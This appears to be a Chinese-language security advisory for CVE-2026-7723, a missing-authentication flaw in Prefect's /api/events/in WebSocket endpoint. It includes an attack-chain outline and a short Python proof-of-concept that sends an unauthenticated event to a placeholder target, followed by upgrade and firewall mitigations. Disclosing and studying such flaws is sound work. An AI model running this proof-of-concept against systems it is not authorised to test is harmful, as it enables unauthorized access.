IPBUF安全漏洞报告
English
CVE-2026-7723 CVSS 7.3 高危

CVE-2026-7723: Prefect身份验证缺失漏洞

披露日期: 2026-05-04
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-7723
漏洞类型
身份验证缺失
CVSS评分
7.3 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
PrefectHQ prefect

相关标签

身份验证缺失PrefectCVE-2026-7723高危WebSocket

漏洞概述

PrefectHQ prefect在3.6.14之前的版本中存在安全漏洞,该漏洞位于WebSocket端点/api/events/in。由于缺少身份验证机制,远程攻击者可无需认证利用此漏洞,对系统造成机密性、完整性及可用性的低程度影响。建议尽快升级至修复版本。

技术细节

该漏洞源于PrefectHQ prefect软件组件中的WebSocket端点/api/events/in未能正确实现身份验证逻辑。在受影响版本(3.6.13及以下)中,攻击者无需提供任何凭证或用户交互,即可通过网络向该端点发送特制的恶意数据包。由于系统未对发往此接口的请求进行必要的权限校验,攻击者可绕过安全控制,执行未授权的操作。根据CVSS 3.1向量分析,该攻击复杂度低,且无需特权,虽然单次利用的影响主要为低程度(C:L/I:L/A:L),但由于认证完全缺失,其潜在风险较高,可能被用于进一步探测或构建攻击链。

攻击链分析

STEP 1
侦察
攻击者通过网络扫描或资产发现,识别出运行PrefectHQ prefect 3.6.13及以下版本的目标服务器。
STEP 2
武器化
攻击者准备特制的WebSocket数据包,该数据包旨在发送至/api/events/in端点,内容可包含探测或恶意指令。
STEP 3
交付
攻击者直接与目标主机的WebSocket端点/api/events/in建立连接,无需进行任何身份验证。
STEP 4
利用
通过建立好的连接发送恶意数据包,由于缺乏认证检查,系统接受并处理该请求,导致安全边界被突破。
STEP 5
影响
成功利用后,攻击者可获取部分敏感信息、修改低权限数据或造成服务轻微中断。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import asyncio import websockets import json async def send_unauthenticated_event(target_url): """ Proof of Concept for CVE-2026-7723 Demonstrates sending data to the vulnerable WebSocket endpoint without authentication. """ # Construct the vulnerable endpoint path full_url = f"{target_url}/api/events/in" malicious_payload = { "event": "test", "data": "unauthenticated_access" } try: # Connect to the WebSocket endpoint (No headers or tokens required) async with websockets.connect(full_url) as websocket: print(f"[+] Connected to {full_url}") # Send the payload await websocket.send(json.dumps(malicious_payload)) print(f"[+] Payload sent: {malicious_payload}") # Optional: Receive response response = await websocket.recv() print(f"[+] Server response: {response}") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": # Replace with the actual target address target = "ws://<TARGET_IP>:<PORT>" asyncio.run(send_unauthenticated_event(target))

影响范围

PrefectHQ prefect <= 3.6.13

防御指南

临时缓解措施
如果无法立即升级,建议配置防火墙或网络访问控制列表(ACL),严格限制对WebSocket端点/api/events/in的访问来源,仅允许可信的内部IP地址连接,从而降低被远程未授权利用的风险。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表